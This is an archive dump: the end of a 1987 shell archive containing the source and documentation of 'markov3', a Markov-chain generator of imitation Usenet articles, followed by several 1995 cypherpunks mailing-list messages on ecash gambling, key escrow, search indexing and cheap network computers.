else
  echo shar: Extracting \"'Makefile'\" \(53 characters\)
  sed "s/^X//" >'Makefile' <<'END_OF_FILE'
X
Xmarkov3: markov3.o
X	$(CC) -o $@ $(CFLAGS) markov3.o
END_OF_FILE
  if test 53 -ne `wc -c <'Makefile'`; then
    echo shar: \"'Makefile'\" unpacked with wrong size!
  fi
  # end of 'Makefile'
fi
if test -f 'PATCHLEVEL' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'PATCHLEVEL'\"
else
  echo shar: Extracting \"'PATCHLEVEL'\" \(2 characters\)
  sed "s/^X//" >'PATCHLEVEL' <<'END_OF_FILE'
X1
END_OF_FILE
  if test 2 -ne `wc -c <'PATCHLEVEL'`; then
    echo shar: \"'PATCHLEVEL'\" unpacked with wrong size!
  fi
  # end of 'PATCHLEVEL'
fi
if test -f 'README' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'README'\"
else
  echo shar: Extracting \"'README'\" \(2400 characters\)
  sed "s/^X//" >'README' <<'END_OF_FILE'
XThis is a cleaned-up reposting of the markov3 program.  The following
Xchanges have been made:
X
XThe null pointer dereferencing bugs have been fixed (I hope).
X
XThe code that uses "rand" should now be portable (the patches posted
Xto the net to fix this problem were wrong, they break the code on
Xsome machines in order to fix it on others.  I stole some code from
X"hack" to do things right.  If hack works for you, this should).
X
Xmarkov3 now understands "notes" cruft (thanks to Rich Salz).
X
XBecause of the 50% rule in news 2.11, people often use some other
Xcharacter than ">" for inclusions.  markov3 assumes that lines
Xbeginning with any of 
X
X	> < ) | # } ]
X
Xare inclusions (without this rule, funny-looking output results if
Xanyone uses non-standard "quoting").
X
XThe random number generator is initialized using the time, if neither
Xthe -s flag nor the new -x flag is given.
X
XThis will be the last complete posting; a "patchlevel" file is included
Xand I will send out patches if there are further bugs or improvements.
X
XHere's the original README.
X---------------------------------------------------------------------------
XI created a bit of a stir with this program in December 1986 when I
Xused an earlier version of it to simulate a certain well-known net
Xpersonality (Hi Laura!).  It digests Usenet articles and spits out
Xother articles with similar characteristics.  You need lex to run it,
Xbut otherwise it should run on any Unix I know of.  
X
XI had several requests for the program but didn't consider it
X"ready".  It's as ready as it will ever be now.
X
XThe program uses getopt(3).  There are several public-domain versions
Xavailable for Berkeley systems from the mod.sources archives.  Since
Xit's small, I've included Henry Spencer's version, but you'll have
Xto change the Makefile to use it.
X
XFor best results, feed it at least ten articles by the same person
Xor on the same subject.  If there are fewer articles the output
Xresembles the original too much; if there is too much variety in
Xthe articles the output is more incoherent than it otherwise is.
X
XThe program requires lots of memory if it is given lots of input;
Xthe small-model people will have problems.
X
XPlease don't post the output to the net (though I'd be happy to
Xsee some of the more interesting results).
X
XSend comments, suggestions for improvement, fan mail, and flames
Xto me: {sun,hplabs,ames,ihnp4}!oliveb!epimass!jbuck.
END_OF_FILE
  if test 2400 -ne `wc -c <'README'`; then
    echo shar: \"'README'\" unpacked with wrong size!
  fi
  # end of 'README'
fi
if test -f 'markov3.6' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'markov3.6'\"
else
  echo shar: Extracting \"'markov3.6'\" \(2503 characters\)
  sed "s/^X//" >'markov3.6' <<'END_OF_FILE'
X.\" markov3
X.\" @(#)markov3.6	1.1 3/6/87 epimass!jbuck
X.TH MARKOV3 6 "3/6/87"
X.UC 4
X.SH NAME
Xmarkov3 \- Digest and spit out quasi-random Usenet articles
X.SH SYNOPSIS
X.B markov3
X[
X.B \-pv
X] [
X.B \-n
X.I n_articles
X] [
X.B \-d
X.I dumpfile
X] [
X.B \-s
X.I seed
X] [
X.B \-x
X]
Xfiles
X.SH DESCRIPTION
X.PP
X.I Markov3
Xdigests Usenet articles and builds an internal data structure that
Xmodels the articles as if they came from a random process, where
Xeach word is determined by the previous two.  It then emits a series
Xof articles on the standard output that have the same distribution
Xof words, word pairs, and word triplets as do the input files.
XThe name
X.I markov3
Xcomes from the fact that this structure is called a Markov chain,
Xand that the statistics for word triplets are modeled.
XHere, a "word" is a sequence of printable characters surrounded by
Xwhitespace.  Paragraph breaks (blank lines) are also treated as a
X"word".  Paragraphs of included text are treated as single "words"
Xand printed as "> ...".
X.PP
XBy default, the program expects to be fed Usenet articles; it strips
Xoff headers, included text, and signatures (or at least it tries).
XThe
X.B \-p
X(plain) option disables the header-stripping feature (otherwise
Xeverything is skipped until a blank line is encountered).
X.PP
XBy default, 10 articles, separated by form feeds, are written on the
Xstandard output.  The
X.B \-n
Xoption lets you specify a different number.
X.PP
XThe
X.B \-x
Xoption does not seed the random number generator; this is useful
Xfor simulating people who repeat themselves.
X.PP
XThe
X.B \-d
X(dump) option dumps a representation of the internal data structure
Xbuilt by
X.I markov3
Xon the named file.
X.PP
XFinally, the
X.B \-v
X(verbose)
Xoption prints some statistics on the standard error.
X.SH "CAVEATS"
XThis program allocates lots of memory if given large amounts of input.
XOn virtual memory systems, the paging behavior is atrocious because
Xpointers tend to point every which way, and many pointers are dereferenced
Xfor every word processed.  This could be improved, I'm sure.
X.PP
XPosting articles generated by
X.I markov3
Xto the net may be hazardous to your health.
X.PP
XNot as smart as Mark V. Shaney.
X.SH "PORTABILITY"
XAn effort has been made to make this program as portable as possible;
Xan earlier version was much less portable because of problems with
Xnull pointers and rand(3).  Please let me know if you have further problems.
X.PP
XIf you don't have lex, you'll need to rewrite the lexical analyzer
Xbut most of the program is in C.
END_OF_FILE
  if test 2503 -ne `wc -c <'markov3.6'`; then
    echo shar: \"'markov3.6'\" unpacked with wrong size!
  fi
  # end of 'markov3.6'
fi
if test -f 'markov3.l' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'markov3.l'\"
else
  echo shar: Extracting \"'markov3.l'\" \(11822 characters\)
  sed "s/^X//" >'markov3.l' <<'END_OF_FILE'
X%{
X/*
X * Copyright (c) 1986, 1987 by Joe Buck
X *
X * Permission is granted to use, redistribute, or modify this program,
X * as long as you don't pretend you wrote it.  Send improvements or
X * bug reports to {ihnp4,hplabs,ames,sun}!oliveb!epimass!jbuck.
X *
X * The program generates simulated Usenet articles, given Usenet articles
X * as input.
X *
X * This program constructs a table of frequencies for a token appearing,
X * given the two preceding tokens.  A "token" is a sequence of non-blank
X * characters.  An entirely blank line is also treated as a token, as is
X * the beginning and end of an article.
X *
X * The program is designed to process news articles, rejecting text from
X * the header, signature, and included text, together with cruft inserted
X * by rn and notes.  A paragraph of included text is treated like a token.
X *
X * After the table is built (and it can be big), articles are generated
X * on the standard output.
X */
X#ifndef lint
Xstatic char *sccs_id = "@(#)markov3.l	1.1 3/6/87 epimass!jbuck";
X#endif
X#include <sys/types.h>		/* for time_t */
Xint in_included_text = 0;
X#ifdef yywrap
X#undef yywrap
X#endif
X%}
X%Start HDR BODY SIG
X%%
X<HDR>^[^ \t]+:.*\n	;	/* Header line, e.g. "From: foo@bar.UUCP" */
X<HDR>^[ \t]+[^ \t].*\n	;	/* Continuation of header line */
X<HDR>^[ \t]*$		BEGIN BODY;
X<BODY>^"-- "$		BEGIN SIG;
X<BODY>^[><)|#}].*\n	{ /* 50% rule gets people to change ">"
X			     to other characters; this gets most of them */
X			  if (!in_included_text) {
X    			      in_included_text = 1;
X			      process_token ("\n> ...\n\n");
X			  }
X			}
X<BODY>"]".*\n		{ /* should have been included in the above.  My
X			     lex generates bad C code if I say [[><...]
X			     even though ed(1) says that's a valid regular
X			     expression. */
X			  if (!in_included_text) {
X			      in_included_text = 1;
X			      process_token ("\n> ...\n\n");
X			  }
X			}
X<BODY>^"In article".*\n	;	/* Reject rn crud */
X<BODY>^"/* Written".*"*/"\n	;		/* Also NOTES crud */
X<BODY>^"/* End of text from".*"*/"\n	;		/* NOTES */
X<BODY>^"/* ----------".*"----------*/"\n	;		/* NOTES */
X<BODY>[ \t]+		;	/* Skip white space */
X<BODY>\n[ \t\n]*\n	{ process_token ("\n"); /* Paragraph break */}
X<BODY>^\..*		;	/* Ignore format directives. */
X<BODY>[^ \t\n]+		{ in_included_text = 0; process_token (yytext); }
X<HDR>.			;	/* Eat anything that escaped */
X<HDR>\n			;
X<BODY>\n		;
X<SIG>.			;
X<SIG>\n			;
X%%
Xextern int optind;
Xextern char *optarg;
X
X/*
X * hashtab is a hash table storing all the tokens we encounter.
X */
Xstruct htentry {
X    char *htext;
X    struct htentry *hlink;
X};
X
X#define HSIZE 3557		/* Should be prime */
X#define Fprintf (void)fprintf
X#define Printf (void)printf
X
Xstruct htentry hashtab[HSIZE];
X
X/*
X * node and succnode are portions of the big structure we're going to build.
X * node represents something like ("was", "a") in a binary tree.
X * a linked list of succnodes contain tokens that may follow ("was", "a")
X */
Xstruct node {
X    char *text;
X    char *text2;
X    int ocount;
X    struct node *lc, *rc;
X    struct succnode *succ;
X};
X
Xstruct succnode {
X    struct node *scnod;
X    int    count;
X    struct succnode *link;
X};
X
X
Xstruct node *prev_code = NULL;
Xchar *prev_token = NULL, **Argv;
Xint init_state = HDR;
Xint verbose = 0;
Xstruct node *root = NULL, *tknptr;
Xstruct succnode *start = NULL;
Xint n_pairs = 0, n_tokens = 0, n_files = 0, n_total = 0;
X
Xstruct node *insert_token();
Xchar *savetoken();
X
Xprocess_token (txt)
Xchar *txt;
X{
X     struct node *code;
X     char *token = savetoken (txt);
X/* We have a new token.  Say the previous two tokens were "one" "way"
X * and the current token is "to".  Then prev_code points to a node
X * for ("one", "way") and token is "to".  This function adds ("way", "to") as a
X * successor to ("one","way") and makes prev_code point to ("way","to").
X */
X     code = insert_token (prev_token, token);
X     insert_pair (prev_code, code);
X     prev_code = code;
X     prev_token = token;
X     return;
X}
X
X/*
X * here it is, the main function.
X */
Xmain (argc, argv)
Xint argc;
Xchar  **argv;
X{
X    int     i, c, n_articles = 10, sflag = 0;
X    char *dumpfile = NULL;
X    extern int  optind;
X    extern char *optarg;
X
X    while ((c = getopt (argc, argv, "pxvn:d:s:")) != EOF) {
X	switch (c) {
X	    case 'v':
X		verbose = 1;
X		break;
X	    case 'p':		/* Input is plain text, not Usenet stuff */
X		init_state = BODY;
X		break;
X	    case 'n': 		/* # articles to generate */
X		n_articles = atoi (optarg);
X		break;
X	    case 'd':		/* where to dump the data structure */
X		dumpfile = optarg;
X		break;
X	    case 's':		/* Set the seed for rand; fall through */
X		srand (atoi (optarg));
X	    case 'x':		/* set flag to prevent srand */
X		sflag++;
X		break;
X	    default:
X		Fprintf (stderr,
X		 "Usage: markov3 [-pvx] [-s seed] [-n n_art] [-d dump] files\n");
X		exit (1);
X	}
X    }
X    BEGIN init_state;		/* initial state of lexical analyzer */
X    if (!sflag)			/* set random number generator */
X	srand ((int)time ((time_t *)0));
X/* Note: if optind == argc, there are no file arguments.  yyin is left
X * initialized to stdin.
X */
X    if (optind < argc) {
X/* yyin is lex input stream.  Point to first file. */
X	if ((yyin = fopen (argv[optind], "r")) == NULL) {
X	    perror (argv[optind]);
X	    exit (1);
X	}
X	optind++;		/* skip to next file */
X    }
X    Argv = argv;		/* make it global so yywrap can access it */
X    n_files = 1;
X/* yylex puts all the input files through the lexical analyzer and builds
X * the database.
X */
X    (void) yylex ();
X    if (dumpfile)
X	dump_database (dumpfile);
X    if (verbose)
X	Fprintf (stderr,
X	 "Total of %d tokens (%d different), %d different pairs, %d files\n",
X		n_total, n_tokens, n_pairs, n_files);
X/* Generate the articles, separated by form feeds */
X    for (i = 0; i < n_articles; i++) {
X	if (i > 0) output_word ("\n\f\n");
X	generate_article ();
X    }
X    return 0;
X}
X
X/*
X * Lex calls this when EOF is reached.  It opens the next file if there
X * is one.  Lex interprets a return value of 1 to mean "all done" and 0
X * to mean "keep going".
X */
Xyywrap () {
X    (void) fclose (yyin);
X    insert_pair (prev_code, (struct node *)0);
X    prev_code = NULL;
X    if (Argv[optind] == NULL) return 1;
X    else if ((yyin = fopen (Argv[optind], "r")) == NULL) {
X	perror (Argv[optind]);
X	exit (1);
X    }
X    optind++;
X    in_included_text = 0;
X    if (verbose && n_files % 10 == 0)
X	Fprintf (stderr, "%d files\n", n_files);
X    n_files++;
X    BEGIN init_state;
X    return 0;
X}
X
X/*
X * This function saves a token in the hash table (if it isn't there
X * already) and returns a pointer to the stored copy.
X */
Xchar *
Xsavetoken (txt)
Xchar *txt;
X{
X    int h;
X    char *p;
X    struct htentry *hp;
X
X    n_total++;
X    for (p = txt, h = 0; *p; h += *p++);
X    hp = hashtab + (h % HSIZE);
X    while (hp->hlink) {
X	if (strcmp (hp->htext, txt) == 0) {
X	    return hp->htext;
X	}
X	hp = hp->hlink;
X    }
X/* OK, it's a new token.  Make hp->hlink point to a new,
X * null block and make hp->htext point to the text.
X */
X    hp->hlink = (struct htentry *) malloc (sizeof *hp);
X    hp->htext = malloc ((unsigned)(strlen (txt) + 1));
X    (void) strcpy (hp->htext, txt);
X    hp->hlink->hlink = NULL;
X    hp->hlink->htext = NULL;
X    n_tokens++;
X    return hp->htext;
X}
X
X/*
X * This recursive function inserts a token pair into the tree.
X */
Xstruct node *
Xinsert_in_tree (p, txt, txt2)
Xstruct node *p;
Xchar *txt, *txt2;
X{
X    int cmp;
X    if (p == NULL) {
X/* Create a new node. */
X	p = (struct node *) malloc (sizeof *p);
X	p->text = txt;
X	p->text2 = txt2;
X	p->lc = p->rc = NULL;
X	p->succ = NULL;
X	p->ocount = 1;
X	tknptr = p;
X	n_pairs++;
X	if (verbose && n_pairs % 1000 == 0)
X	    Fprintf (stderr, "%d pairs\n", n_pairs);
X	return p;
X    }
X    cmp = my_strcmp (p->text, txt);
X    if (cmp == 0) cmp = my_strcmp (p->text2, txt2);
X    if (cmp == 0) {
X/* It's a match.  Increment the count. */
X        tknptr = p;
X	p->ocount += 1;
X    }
X/* Look in the subtrees. */
X    else if (cmp < 0) p->lc = insert_in_tree (p->lc, txt, txt2);
X    else p->rc = insert_in_tree (p->rc, txt, txt2);
X    return p;
X}
X
X/*
X * This just calls insert_in_tree starting at the root
X */
Xstruct node *
Xinsert_token (txt, txt2)
Xchar *txt,*txt2;
X{
X    root = insert_in_tree (root, txt, txt2);
X    return tknptr;
X}
X
X/*
X * This function adds a successor.
X */
Xstruct succnode *
Xinsert_in_succ_chain (sp, np)
Xstruct succnode *sp;
Xstruct node *np;
X{
X    if (sp == NULL) {
X	sp = (struct succnode *) malloc (sizeof *sp);
X	sp->scnod = np;
X	sp->count = 1;
X	sp->link = NULL;
X    }
X    else if (sp->scnod == np)
X	sp->count += 1;
X    else sp->link = insert_in_succ_chain (sp->link, np);
X    return sp;
X}
X
X/*
X * This calls insert_in_succ_chain starting at the right place.
X */
Xinsert_pair (p1, p2)
Xstruct node *p1, *p2;
X{
X    if (p1) p1->succ = insert_in_succ_chain (p1->succ, p2);
X    else start = insert_in_succ_chain (start, p2);
X}
X
X/*
X * This function dumps the stored data structure onto a file.
X * Now if only I had a function to read it back in.
X */
Xchar *
Xpr_token (txt)
Xchar *txt;
X{
X    if (txt[0] != '\n')
X	return txt;
X    return txt[1] ? "<INCL>" : "<LF>";
X}
X
Xtreedump (tree, fp)
Xstruct node *tree;
XFILE *fp;
X{
X    if (tree) {
X	treedump (tree->rc, fp);
X	Fprintf (fp, "( %s %s ) %d", pr_token (tree->text),
X			pr_token (tree->text2), tree->ocount);
X	chaindump (tree->succ, fp);
X	treedump (tree->lc, fp);
X    }
X}
X
X/*
X * Subroutine of treedump; it does one row.
X */
Xchaindump (p, fp)
Xstruct succnode *p;
XFILE *fp;
X{
X    char   *text;
X    while (p) {
X	if (p->scnod == NULL)
X	    text = "<EOF>";
X	else text = pr_token (p->scnod->text2);
X	Fprintf (fp, " %s %d", text, p->count);
X	p = p->link;
X    }
X    putc ('\n', fp);
X}
X
X/*
X * This routine generates the dump file (-d option)
X */
Xdump_database (file)
Xchar *file;
X{
X    FILE *fp = fopen (file, "w");
X    if (fp == NULL) {
X	Fprintf (stderr, "markov: can't open ");
X	perror (file);
X	exit (1);
X    }
X    Fprintf (fp, "START:");
X    chaindump (start, fp);
X    treedump (root, fp);
X}
X
X/* roll (n) generates a uniformly distributed rv between 0 and n-1.
X * This code is stolen from "hack" and should be portable.  If you
X * change this, remember that different systems have rand functions
X * with different ranges, and the bottom bits are often no good.
X */
X#define roll(n) ((rand() >> 3) % n)
X
X/*
X * This function generates an article by traversing the
X * structure we've built.
X */
Xgenerate_article () {
X    struct succnode *p = start;
X    int ncounts = n_files;
X    int n, accum;
X    char *tp;
X
X    while (1) {
X/* Roll the dice to find out the next token.  The code below selects the
X * next token, and the new state, with a probability corresponding to the
X * frequency in the input.
X */
X	n = roll (ncounts);
X	accum = p->count;
X	while (accum <= n && p->link) {
X	    p = p->link;
X	    accum += p->count;
X	}
X	if (p->scnod == NULL)
X	    break;
X	tp = p->scnod->text2;
X/* Check for "end of story" */
X	if (tp == NULL)
X	    break;
X	output_word (tp);
X	ncounts = p->scnod->ocount;
X	p = p->scnod->succ;
X    }
X    output_word ("\n");	/* This will flush the buffer as well. */
X    return;
X}
X
X/*
X * This version handles null strings *
X */
Xmy_strcmp (a, b)
Xregister char *a, *b;
X{
X    if (a == NULL) return b ? -1 : 0;
X    if (b == NULL) return 1;
X    return strcmp (a, b);
X}
X
X#define LEN 75
Xoutput_word (word)
Xchar *word;
X{
X    static char line[LEN+1];
X    static int room = LEN;
X    int l;
X
X    if (word == NULL) return;
X    l = strlen (word);
X/* If word won't fit, or starts with \n, dump the current line */
X    if ((l >= room || word[0] == '\n') && line[0]) {
X	Printf ("%s\n", line);
X	line[0] = 0;
X	room = LEN;
X    }
X/* If word won't fit in the buffer or starts with \n, print it now */
X    if (l >= LEN)
X	Printf ("%s\n", word);
X    else if (word[0] == '\n')
X	Printf ("%s", word);
X/* Otherwise fill it in */
X    else {
X	(void)strcat (line, word);
X	(void)strcat (line, " ");
X	room -= (l + 1);
X    }
X    return;
X}
END_OF_FILE
  if test 11822 -ne `wc -c <'markov3.l'`; then
    echo shar: \"'markov3.l'\" unpacked with wrong size!
  fi
  # end of 'markov3.l'
fi
echo shar: End of archive.
exit 0




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 2 Dec 1995 19:23:16 +0800
To: loki@obscura.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512010807.AAA12540@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 AM 12/1/95 +0600, Ed Carp wrote:
>The only problem with this approach is that this will bite other 
>browsers that have started supporting the so-called "Netscape 
>extensions".  More than one person has coded the Netscape stuff into 
>their pages because it gives the author more flexibility than the 
>standard 1.0/2.0 standards.  And there aren't many browsers out there 
>yet that support 3.0.

http://www.netmanage.com/  have a free browser that supposedly supports
3.0 -- I have not tested it yet, though I downloaded it a short while
ago.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 30 Nov 1995 07:36:41 +0800
To: sameer <sameer@c2.org>
Subject: Re: ecash casino
In-Reply-To: <199511291640.IAA28114@infinity.c2.org>
Message-ID: <9511292318.AA27417@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org writes:
 > 	Any enterprising cypherpunks in gambling-friendly
 > jurisdictions interested? I figure it would make ecash take off.. and
 > you'd get rich.
Good idea, I'd gladly provide (read sell ;-) know-how :-)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

DST Kaser Sose Panama Castro Khaddafi Ortega arrangements




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 13:43:08 +0800
To: jlasser@rwd.goucher.edu
Subject: Re: The future will be easy to use
Message-ID: <01HY8GNOCLCS8WYXCN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jlasser@rwd.goucher.edu"  "Jon Lasser" 29-NOV-1995 16:23:00.41

Not if you're encrypting a Credit Card transaction to ship physical 
goods.  In that case, I'm going to certainly want to link a key ID to a 
physical body (or at least address) if I'm the seller, so as to limit 
liability as best I can.

While this might not ultimately be important, early adopters of crypto on 
the net seem in general to be financially interested with an eye to limiting 
liability. They want linked keys.

There's a public-relations aspect to crypto which most systems not 
linking name -> key id fail.  This is the step necessary to get it out 
the door.

Unfortunately, it also appears counter to CP philosophy.

However, if you have optional linking of ID and name, shippers will only 
ship to keys with such attributes. Because just ID and address, it could 
be a "hit and run" type attack shipped to a safe maildrop.
---------------------------------
	If the transaction is via a Credit Card, it's the card issuer's
liability (and responsibility to determine creditworthiness), unless I'm badly
mistaken. If it's bank-issued ecash, then it's up to the bank to disgorge
physical dollars when ecash is presented to them. What's the risk in either
case?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 13:44:58 +0800
To: tcmay@got.net
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <01HY8GTQ0EGY8WYXCN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 29-NOV-1995 23:16:11.12

Personally, I have long had great _hopes_ for using crypto for
non-sanctioned gambling, but I'm pretty skeptical that many people will do
it. For one thing, anyone knowledgeable enough to be comfortable with the
crytography knows that gambling when a house cut exists is a lose. (And
gambling with no house cut is, at best, a wash.)
-----------------------
	How about gambling on something other than random numbers? Idea Futures
are one instance, as is sports gambling for those interested in that sort of
thing.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Sat, 2 Dec 1995 09:25:56 +0800
To: cypherpunks@toad.com
Subject: META: Lycos & Searchable archives
Message-ID: <199511300556.AAA15009@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Someone has expressed concern to me that the cypherpunks archives are
searchable via Lycos.  Said person doesn't mind having the archives
searchable to the smaller audience of people who go to the we-site,
but is unhappy about net-wide searches turning up cypherpunks articles.

Can we try to find a consensus on this?  My initial inclination was to
shrug the concern off (properties of information, etc, as well as c'punks
being a more-or-less anarchy and the express desire for some sort of
searching mechanism for c'punks), but I thought I'd double check as I've
been mostly out of touch for the better part of a year.
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBML1HiCoZzwIn1bdtAQEtjgF/d7GBzgELk41OE+/pZxnZkzn+qYLRHmTn
8mbScBdkko83n4sxGjwFRQJyN5IlPCJQ
=nFDi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 Nov 1995 14:01:04 +0800
To: cypherpunks@toad.com
Subject: Esoteric Lotteries Re: Quit it!
In-Reply-To: <199511300520.GAA07040@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9511300050.A20502-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


One might be tempted to use the number of posts claiming to be from Alice 
d'Anonymous on any particular day as a fair random number basis for some
gambling scheme.

 Good going Alices
					Not another one of those...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 1 Dec 1995 09:11:10 +0800
To: sameer <sameer@c2.org>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951130010850.18600A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, sameer wrote:

> http://www.cnet.com/Central/News/govt.html
> 
> 	Bad. Very Bad. And I was almost starting to like Netscape.

Ahh well there goes my respect for netscape to. *sight*
Ahh well guess someone will just have to write a virus
to say enhance all escrow equiped version of netscape that come out.
Of course I dont have to point out to netscape we wont buy
any escrowed products from them. Hmmm Open Market is starting to
look better.

> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Thu, 30 Nov 1995 21:22:38 +0800
To: tcmay@got.net
Subject: Re: Diskless "Eunuchs" Machines Likely to Fail
In-Reply-To: <ace0059603021004f459@[205.199.118.202]>
Message-ID: <gfNvw4B4GX4D088yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <ace0059603021004f459@[205.199.118.202]>, Timothy C. May wrote:


>A couple of years ago "the computer for the rest of us" was said to be a
>pen-based Newton-type machine, now it is said to be a diskless,
>memory-limited "Eunuchs" machine.



Beyond the specifics of Oracle's naive vision, I think what is
doomed (I hope) to fail is the obsolescent paradigm that it reflects.
It seems that many corporate types are fixated on the idea of tractable
and predictable consumers.  The need to raise the population and
broaden the demographic of potential customers for the coming
Information SuperMarketway by minimizing the entry cost is obvious. The
approach to understanding the actual dynamics of why people are and
will increasingly come into this space and what they will want to do
once they get there is deficient for many.  Some are intimidated by the
unpredictably evolving emergent properties of consumer (well, still
mostly window shopper) behavior in this new territory, and are looking
for the comforting familiarity that their marketing consultants and
financial planners could provide them in the old brickspace way of doing
business.  Others are puzzled, or are overtly threatened by the idea of
potential consumer's who are also content producers.

I think that the limitations of interactive set-top boxes and
lobotomized net terminals appeals to this mindset.  There's less
likelihood of troubling novel behavior and initiative.  The consumer's
options are constrained and thereby the details of marketing are more
manageable.

These prospective cyber-consumers who are increasingly in the
frustrating habit of producing and sharing content amongst themselves
(usually for free, no less!), thereby distracting each other from the
content providers and virtual storefronts they should be flocking to,
are a potent wild card in the game that many cannot deal with, and some
wish they could deal out of the deck.  This nascent internet phenomenon
is the economic aspect of the broader disintegration and decline of the
means to control mass opinion and behavior that many in the current
ruling class find threatening as well.  The corporations that can get a
clue, and learn how to go with the flow of this changing environment, can
still prosper. The dinosaurs who can't, or won't adapt, will free up
valuable niches for the independent upstarts who not only can ride the
waves of change, but who thrive on them and even strive to make them
bigger.

Oracle's vision of the low-cost, diskless "Eunuchs" net station
may materialize on the shelves of Walmart, and Circuit City, etc...
But it will not take long for those who buy them to realize that
they are in a subclass on the internet (That is, if they are really
given the freedom to explore the net at large) and to feel frustrated
with their limited options to create and express themselves.  Those
too dim-witted to notice or care might as well have remained as bovine
Cable Shopping Network viewers ensconced in their TV room lounge chairs.

I do think that there is a substantial and viable market for entry level
notebook form factor (running off a cheap wall socket DC converter with
battery optional) 'Net' PC's well below $1000 in the not-too-distant
future.  Processor and hard drive costs are certainly dropping fast
enough to make that a credible possibility.  Display and memory costs
remain the major obstacles, but I think workable compromises could be
made.

This could be a potent opportunity for somebody like the AIM alliance
to make an end run around the Intel-Microsoft axis, if they were able to
take the long view and act decisively (yeah...fantasy).  Start with
something like the low end PPC602, develop a highly integrated chip set
for video, drive, RAM controller, modem,  etc... Surface mount on board
with RJ-11, USB and external monitor connector, include as much HD as
will fit within the target production cost. Throw in a SIMM or DIMM slot
for the option of supplementing the minimum included memory later.
Provide greyscale LCD standard with color dual-scan option.  Come up
with a _TIGHT_ fully native code subset of MacOS.  Add a compact
application suite including internet connectivity plus simple PIM and WP
functionality. Provide a coupon for a subsidiary online service cum
internet gateway, ala MSN. Sell the machine at a minimal margin over
cost, and view the entire venture as a way to gain broad market
presence. Market presence must have substantial worth, because
Netscape's stock is surely not being valued on its price-earnings
ratio.


>The only relevance of this whole topic to Cypherpunks is....is....minimal.


Well, perhaps.  I suppose I'm risking the chastisement of Cypherpunk
purists with my follow-up on this non-crypto topic. But it seems to me
that the broadest shared sentiment among the people on this list is a
passionate interest in defending and expanding personal liberty,
sovereignty and privacy in cyberspace, and the realization that
the unencumbered use of strong cryptography is indispensable to those
goals. If it wasn't for this nexus, there would be no cypherpunks, and
the esoteric technicalities of modern cryptography would be of interest
to few besides professional security consultants/programmers and obscure
academic types.  It's useful to explore the wider context of relevance
occasionally, if only to gain perspective (As long as we can avoid
another Ayn Rand or Noam Chomsky pissing match...).


ObCrypto:

People limited solely to diskless terminals for their internet access will
be second class netizens.  They would be less likely to really
appreciate and comprehend the issues surrounding online privacy and
cryptography, and they would be less able to take action on these issues
even if they wanted to.


- -Michael



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML1jZtGJlWF+GPx9AQGhcAP/WL7+Unoxn51A2QlCRRSsS8wXdi7/UuFz
3JSC49VJLU7KFWEqTwhIV657JubChxUjN1mxymSDbaoROWcyPn8AlEVuLD2Y/NcW
SYYCAy1nJWh8H2yFAz1aW2XToG09V/XrO/hhcN8WyM8agJoYcVxdCmRuC/6bhPnG
qBcMn7amGnE=
=/Qbk
-----END PGP SIGNATURE-----




